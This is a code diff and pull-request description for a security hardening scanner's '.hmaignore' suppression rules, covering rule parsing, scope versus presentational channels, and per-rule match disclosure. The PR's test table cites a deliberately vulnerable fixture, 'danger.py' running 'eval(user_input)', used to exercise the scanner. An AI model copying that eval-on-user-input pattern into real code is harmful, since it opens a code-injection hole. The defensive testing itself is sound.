+   * `reapplyIgnoreFilters` call, with `matched` recounted over the post-merge
+   * array — the same array `lastOutOfScope`/`lastSuppressed` are counted
+   * over, so the Σ-matched cross-check holds on the record the CLI adopts.
+   * `undefined` when the target has no `.hmaignore` (presence rule).
+   */
+  lastHmaIgnore: HmaIgnoreDisclosure | undefined = undefined;
+
+  /**
    * Every path a finding speaks for.
    *
    * `details.files`: checks like GIT-001 and PERM-001 point `file` at one
@@ -2791,12 +3148,7 @@ export class HardeningScanner {
    * `details.files`, so reading either side alone loses paths.
    */
   private coveredFilesOf(f: SecurityFindingDraft): string[] {
-    const listed = Array.isArray(f.details?.files) ? f.details.files : [];
-    return [...new Set(
-      [f.file, ...listed].filter(
-        (p): p is string => typeof p === 'string' && p.length > 0,
-      ),
-    )];
+    return coveredFilesOfFinding(f);
   }
 
   /**
@@ -2820,42 +3172,10 @@ export class HardeningScanner {
    * Returns true to KEEP. May re-point `f.file` / `f.details.files` in place.
    */
   private retainAfterPathSuppression(f: SecurityFindingDraft, ignoredPaths: string[]): boolean {
-    // A coverage statement is not a finding ABOUT a path's contents, so a path
-    // rule cannot scope it away (#438).
-    //
-    // `test-fixtures/` in an `.hmaignore` means "this part of the tree is not my
-    // product", which honestly removes findings about what is IN those files.
-    // It cannot make the scan's own claim about what it READ true. And the
-    // paragraph above is explicit that scoping is legitimate *provided the scope
-    // is disclosed* — for this finding that proviso does not hold: `outOfScope`
-    // is rendered as a bare count on text and `--json`, and NOT AT ALL on sarif,
-    // asff and html. Letting a path rule clear this gate therefore produced
-    // exit 0 with nothing said on three of the five channels, on the channels a
-    // CI consumer reads. Measured, and it is the exact failure this unit exists
-    // to remove.
-    //
-    // So it stays visible and stays in the exit code. The remedy is to make the
-    // file readable or to scan a narrower target — not to declare the unread
-    // file out of scope. If `outOfScope` ever renders on every channel, this
-    // carve-out is the thing to revisit.
-    if (f.checkId === 'SCAN-UNREAD-001') return true;
-
-    const covered = this.coveredFilesOf(f);
-    // Nothing path-shaped to judge — a finding about the tree as a whole.
-    if (covered.length === 0) return true;
-
-    const survivors = covered.filter((p) => !this.isPathIgnored(p, ignoredPaths));
-    if (survivors.length === 0) return false;
-    if (survivors.length === covered.length) return true;
-
-    // Partially ignored: keep it, but stop naming suppressed paths.
-    if (f.file && this.isPathIgnored(f.file, ignoredPaths)) {
-      f.file = survivors[0];
-    }
-    if (Array.isArray(f.details?.files)) {
-      (f.details as { files: string[] }).files = survivors;
-    }
-    return true;
+    // The SCAN-UNREAD-001 carve-out and the full history live on the
+    // module-level function, which `matchHmaIgnore` and the `check` command
+    // share so `secure` and `check` apply one rulebook.
+    return retainAfterPathSuppression(f, ignoredPaths);
   }
 
   /**
@@ -2940,12 +3260,7 @@ export class HardeningScanner {
   }
 
   private isPathIgnored(filePath: string, ignoredPaths: string[]): boolean {
-    if (!filePath || ignoredPaths.length === 0) return false;
-    const normalized = filePath.replace(/\\/g, '/');
-    return ignoredPaths.some(pattern => {
-      const normalizedPattern = pattern.replace(/\\/g, '/').replace(/\/$/, '');
-      return normalized.startsWith(normalizedPattern + '/') || normalized === normalizedPattern;
-    });
+    return isPathIgnored(filePath, ignoredPaths);
   }
 
   /**
@@ -2987,12 +3302,14 @@ export class HardeningScanner {
     const isQuick = scanDepth === 'quick';
     const isDeepScan = scanDepth === 'deep';
 
-    // Load .hmaignore for path-based exclusions and check ID suppressions
-    const hmaIgnore = await this.loadHmaIgnore(targetDir);
-    // Merge with any programmatic ignorePaths
-    const allIgnoredPaths = [...hmaIgnore.paths, ...(options.ignorePaths || [])];
-    // Check ID suppression patterns from .hmaignore (supports wildcards)
-    const suppressedCheckPatterns = hmaIgnore.checkIds;
+    // Load .hmaignore: whole-path exclusions, `<path>:<CHECK>` narrowings and
+    // `!CHECK-ID` suppressions, through the one parser
+    const hmaIgnore = await loadHmaIgnore(targetDir);
+    // Merge whole-path rules with any programmatic ignorePaths
+    const allIgnoredPaths = [
+      ...hmaIgnore.rules.filter((r) => r.channel === WHOLE_PATH_CHANNEL).map((r) => r.path as string),
+      ...(options.ignorePaths || []),
+    ];
 
     // Normalize ignore list to uppercase for case-insensitive matching
     // Merge CLI --ignore flags with .hmaignore !-prefixed check IDs
@@ -4074,24 +4391,24 @@ export class HardeningScanner {
     // So: path exclusions leave the scored set and are reported as scope;
     // check-ID suppressions stay in it and are reported as suppression.
     const pathExcluded: SecurityFindingDraft[] = [];
+    const hmaAttribution = new Map<SecurityFindingDraft, number>();
     for (const f of filteredFindings) {
       if (ignoredChecks.has(f.checkId.toUpperCase())) {
         f.suppressed = true;
         f.suppressedBy = 'ignore-flag';
-      } else if (this.isCheckIdSuppressed(f.checkId, suppressedCheckPatterns)) {
-        f.suppressed = true;
-        f.suppressedBy = 'hmaignore-check';
-      } else if (!this.retainAfterPathSuppression(f, allIgnoredPaths)) {
-        // #280's re-pointing behaviour is preserved: `retainAfterPathSuppression`
-        // returns true for a multi-file finding while ANY covered path survives,
-        // and has already re-pointed `file` onto a survivor by the time it does.
-        // Only a finding whose every covered path is ignored reaches here, so a
-        // partial ignore still keeps its finding and still scores — which is the
-        // #280 rule, unchanged.
-        f.suppressed = true;
-        f.suppressedBy = 'hmaignore-path';
-        pathExcluded.push(f);
+        continue;
       }
+      // `matchHmaIgnore` holds the tier order (whole-path, then
+      // `<path>:<CHECK>`, then `!<CHECK>`) and #280's re-pointing behaviour:
+      // `retainAfterPathSuppression` keeps a multi-file finding while ANY
+      // covered path survives, re-pointed onto a survivor. Only a finding
+      // whose every covered path is ignored comes back as a scope channel.
+      const m = matchHmaIgnore(f, hmaIgnore, options.ignorePaths || []);
+      if (!m) continue;
+      f.suppressed = true;
+      f.suppressedBy = m.channel;
+      if (m.line !== undefined) hmaAttribution.set(f, m.line);
+      if (isScopeChannel(m.channel)) pathExcluded.push(f);
     }
     // Both kinds leave `findings`; they differ in what happens to the SCORE.
     //
@@ -4113,9 +4430,21 @@ export class HardeningScanner {
     // actually is — the score and the gate, via `suppressed`, which
     // `scoreWithSuppressed` adds back.
     const suppressed = summarizeSuppressed(
-      filteredFindings.filter((f) => f.suppressedBy && f.suppressedBy !== 'hmaignore-path'),
+      filteredFindings.filter((f) => f.suppressedBy && !isScopeChannel(f.suppressedBy)),
     );
     const outOfScope = summarizeSuppressed(pathExcluded);
+
+    // Per-rule match counts for the `.hmaignore` disclosure — over the same
+    // findings, through the same `countsAgainstScore` gate, as the two Row
+    // summaries above, so Σ matched per (checkId, channel) equals the Row
+    // count (the cross-check the tests hold).
+    const hmaMatchedByLine = new Map<number, number>();
+    for (const f of filteredFindings) {
+      if (!f.suppressed || !countsAgainstScore(f)) continue;
+      const line = hmaAttribution.get(f);
+      if (line !== undefined) hmaMatchedByLine.set(line, (hmaMatchedByLine.get(line) ?? 0) + 1);
+    }
+    const hmaignoreDisclosure = buildHmaIgnoreDisclosure(hmaIgnore, hmaMatchedByLine);
 
     filteredFindings = filteredFindings.filter((f) => !f.suppressed);
 
@@ -4157,8 +4486,10 @@ export class HardeningScanner {
       if (f.passed && !f.fixed) continue;
       if (survived.has(f)) continue;
       if (ignoredChecks.has(f.checkId.toUpperCase())) continue;
-      if (this.isCheckIdSuppressed(f.checkId, suppressedCheckPatterns)) continue;
-      if (!this.retainAfterPathSuppression(f, allIgnoredPaths)) continue;
+      // One classifier for all three `.hmaignore` channels — a finding any of
+      // them covers was withheld at the USER's request and is disclosed
+      // through `suppressed`/`outOfScope`, not re-reported here.
+      if (matchHmaIgnore(f, hmaIgnore, options.ignorePaths || [])) continue;
       if (!f.file) {
         unevidencedFailures++;
         continue;
@@ -4302,6 +4633,12 @@ export class HardeningScanner {
       // penalties ARE in `score`, and every later re-score must add them back
       // via `expandSuppressed` or the laundering returns.
       suppressed: suppressed.length > 0 ? suppressed : undefined,
+      // The per-rule `.hmaignore` disclosure. Present iff the FILE is present
+      // (rules empty, all-error and matched-nothing included), absent
+      // otherwise — so a document from a tree without the file is
+      // byte-identical to one from before this key existed. CLI-local:
+      // `secure --json` spreads `...result`; no wire builder reads it.
+      hmaignore: hmaignoreDisclosure,
       semanticAnalysis: (layer2Count > 0 || layer3Count > 0) ? {
         layer2Findings: layer2Count,
         layer3Findings: layer3Count,

--- a/src/hardening/security-check.ts
+++ b/src/hardening/security-check.ts
@@ -83,7 +83,7 @@ export interface HmaIgnoreDisclosure {
     expires?: string;
     /** Findings this rule removed from the report on this run. */
     matched: number;
-    /** Line of the whole-path rule that absorbs this rule (CPO §3). */
+    /** Line of the whole-path rule that absorbs this rule. */
     redundantTo?: number;
   }>;
   /** Unparseable, refused, lapsed or unreadable lines. Loud, and exit-neutral. */

--- a/src/hardening/security-check.ts
+++ b/src/hardening/security-check.ts
@@ -29,8 +29,66 @@ export type ProjectType = 'cli' | 'library' | 'sdk' | 'webapp' | 'api' | 'mcp' |
  * report (#450). Named rather than a bare string so the disclosure can say
  * which knob was turned, and so a fourth channel cannot be added without
  * touching this union.
+ *
+ * Split by GATE SEMANTICS, which is the property a channel cannot be allowed
+ * to get wrong: a presentational channel narrows the report and never the
+ * verdict (the finding stays scored and in the exit code), while a scope
+ * channel removes the finding from the score and the exit code because the
+ * committed rule says that part of the tree is not the product. Every site
+ * that partitions findings between `suppressed` and `outOfScope` routes
+ * through `isScopeChannel`, so a fifth channel added to either half of the
+ * union inherits the right gate behaviour instead of falling through a
+ * string comparison onto the wrong side.
  */
-export type SuppressionChannel = 'ignore-flag' | 'hmaignore-check' | 'hmaignore-path';
+export type ScopeChannel = 'hmaignore-path' | 'hmaignore-path-check';
+export type PresentationalChannel = 'ignore-flag' | 'hmaignore-check';
+export type SuppressionChannel = PresentationalChannel | ScopeChannel;
+
+/**
+ * The one spelling of "does this channel leave the exit code". Accepts any
+ * string because the Row types on the wires keep `suppressedBy: string`
+ * (open vocabulary, additive only).
+ */
+export function isScopeChannel(ch: string): ch is ScopeChannel {
+  return ch === 'hmaignore-path' || ch === 'hmaignore-path-check';
+}
+
+/**
+ * The per-rule `.hmaignore` disclosure (CLI-local; terminal and `--json`
+ * only). Present on `ScanResult` iff a `.hmaignore` file exists at the
+ * target — even when `rules` is empty or every rule matched nothing — and
+ * absent otherwise, so a document from a tree without the file is
+ * byte-identical to one from before this field existed.
+ *
+ * Never on a wire: excluded from `SettledOutcome`, every publish payload and
+ * every contribution event, because it necessarily carries paths and
+ * free-text reasons, which the settled record excludes by construction.
+ */
+export interface HmaIgnoreDisclosure {
+  /** '.hmaignore', relative to the target. */
+  file: string;
+  rules: Array<{
+    /** 1-based line in the file. */
+    line: number;
+    /** The line as written. */
+    rule: string;
+    channel: 'hmaignore-path' | 'hmaignore-check' | 'hmaignore-path-check';
+    /** Present for hmaignore-path and hmaignore-path-check. */
+    path?: string;
+    /** Present for hmaignore-check and hmaignore-path-check; UPPER-CASED pattern. */
+    checkId?: string;
+    /** Trailing `# <reason>` text. */
+    reason?: string;
+    /** YYYY-MM-DD as written; only on active rules (a lapsed rule is an error). */
+    expires?: string;
+    /** Findings this rule removed from the report on this run. */
+    matched: number;
+    /** Line of the whole-path rule that absorbs this rule (CPO §3). */
+    redundantTo?: number;
+  }>;
+  /** Unparseable, refused, lapsed or unreadable lines. Loud, and exit-neutral. */
+  errors: Array<{ line: number; rule: string; error: string }>;
+}
 
 export interface SecurityCheck {
   id: string;
@@ -393,6 +451,14 @@ export interface ScanResult {
    * `expandSuppressed` or the laundering this field exists to stop comes back.
    */
   suppressed?: Array<{ checkId: string; name: string; category: string; severity: string; count: number; suppressedBy: string }>;
+  /**
+   * The per-rule `.hmaignore` disclosure. Present iff the file exists at the
+   * target. Carried on `ScanResult` (the `secure --json` document spreads
+   * `...result`), never on `SettledOutcome` or any wire builder — the wires
+   * test in `__tests__/registry` and the key-collision assertion in
+   * `settled-outcome.ts` are the guards.
+   */
+  hmaignore?: HmaIgnoreDisclosure;
   /** Semantic analysis summary (Layer 2 + Layer 3) */
   semanticAnalysis?: {
     layer2Findings: number;

--- a/src/ui/verdict-band.ts
+++ b/src/ui/verdict-band.ts
@@ -262,23 +262,33 @@ export function summarizeSuppressed(
     // "suppressed" would overstate what the flag cost the reader.
     if (!f.suppressed || !countsAgainstScore(f)) continue;
     const checkId = f.checkId || '_unknown_';
-    const existing = rows.get(checkId);
+    const suppressedBy = f.suppressedBy || 'ignore-flag';
+    // Folded per (checkId, channel), not per checkId: with two scope channels
+    // one check can be scoped by both, and a checkId-only key would let the
+    // first-seen channel label the whole row. Invisible on every input where
+    // each check rides one channel, which is every input before the
+    // `<path>:<CHECK>` form existed.
+    const key = checkId + '\0' + suppressedBy;
+    const existing = rows.get(key);
     if (existing) {
       existing.count += 1;
       continue;
     }
-    rows.set(checkId, {
+    rows.set(key, {
       checkId,
       name: f.name || checkId,
       category: f.category || '',
       severity: f.severity || 'info',
       count: 1,
-      suppressedBy: f.suppressedBy || 'ignore-flag',
+      suppressedBy,
     });
   }
   const order: Record<string, number> = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };
   return [...rows.values()].sort(
-    (a, b) => (order[a.severity] ?? 5) - (order[b.severity] ?? 5) || a.checkId.localeCompare(b.checkId),
+    (a, b) =>
+      (order[a.severity] ?? 5) - (order[b.severity] ?? 5)
+      || a.checkId.localeCompare(b.checkId)
+      || a.suppressedBy.localeCompare(b.suppressedBy),
   );
 }
 


### PR DESCRIPTION
## What

`.hmaignore` gains `<path>:<CHECK-ID>`: one check on one path leaves the score and the exit code (the whole-path rule already did that for every check on the path), disclosed as its own rule with a match count. `!<CHECK-ID>` stays presentational. The two parsers and two matchers that existed (`secure` and `check` had different ones) become one exported loader and one matcher.

- Two-step parse: trailing `# reason` stripped (required on the new form), `expires:YYYY-MM-DD` pulled from the end of the rule, path-check rules split at the last colon and the suffix classified by the two check-pattern expressions, so `weird:name.py` and `logs/run-…T10:30:00.log` stay paths while `SKILL.md:SKILL-* # r` is a check rule.
- Errors are loud and exit-neutral: an unparseable line, a glob in a path rule, `<path>:*`, a path-check rule without a reason, a bad or lapsed `expires:` date and an unreadable file all render as `.hmaignore:<line>: …` by default on `secure` and `check` and appear in `hmaignore.errors[]`; none moves the exit code, and a lapsed rule's findings return to the report.
- `secure --json` and `check --json` carry an `hmaignore` key iff the file exists: every rule as written, its channel, upper-cased check id, reason, active `expires`, `matched`, `redundantTo`. The key never rides a wire (a test asserts it on all five outbound builders).
- Suppression rows fold by (checkId, channel); scope-channel findings route to `outOfScope` through `isScopeChannel` at the three sites that previously compared a literal.
- `--json` gains a top-level key and a new value on `suppressedBy`: minor release, never patch. Three behaviour changes on existing files are named in the CHANGELOG: `danger.py # reason` becomes an active scope rule, `!X # reason` becomes active, `*.py` becomes a loud exit-neutral error.

## Measured

| check | result |
|---|---|
| 47-row parser table (accept/reject rows with expected classification, reason, expires, error line) | all rows pass; red at the base parser |
| exit-code matrix on `danger.py` = `eval(user_input)`, built CLI, neutral HOME | none: exit 1 / 69 / NEMO-009 reported; `danger.py:NEMO-009 # r`: exit 0 / 93 / outOfScope via `hmaignore-path-check` (identical to none at the base); `!NEMO-009`: exit 1 / 69 / suppressed; `danger.py`: exit 0 / 93 |
| refused forms (`danger.py:*`, `danger.py:NEMO-009` without reason, `*.py`, `expires:2026-08-31`, `weird:bar-baz`) | each an `errors[]` entry at line 1; exit 1 / 69 unchanged |
| `danger.py:nemo-009 # r`, `danger.py:NEMO-* # r`, `danger.py # scope`, `!NEMO-009 # r` | active as ruled (path-check / path-check / path / check), match count 1 |
| `npx tsc --noEmit` | exit 0 |
| the five new test files | 75 passed |
| plain `npm test` (the pre-push hook's invocation) | 378 files, 5081 passed / 4 skipped / 10 todo before the parity-test fix (1 failed on a fixture id, fixed in the second commit) |
| self-scan `secure --ci` on the tree | 95, exit 0, 0 critical/high |

The rendered strings (error messages, README section, CHANGELOG entry) are content per the rulings and are flagged for the editorial review before merge; the committed tests assert the CONTENT each must carry, not the wording.
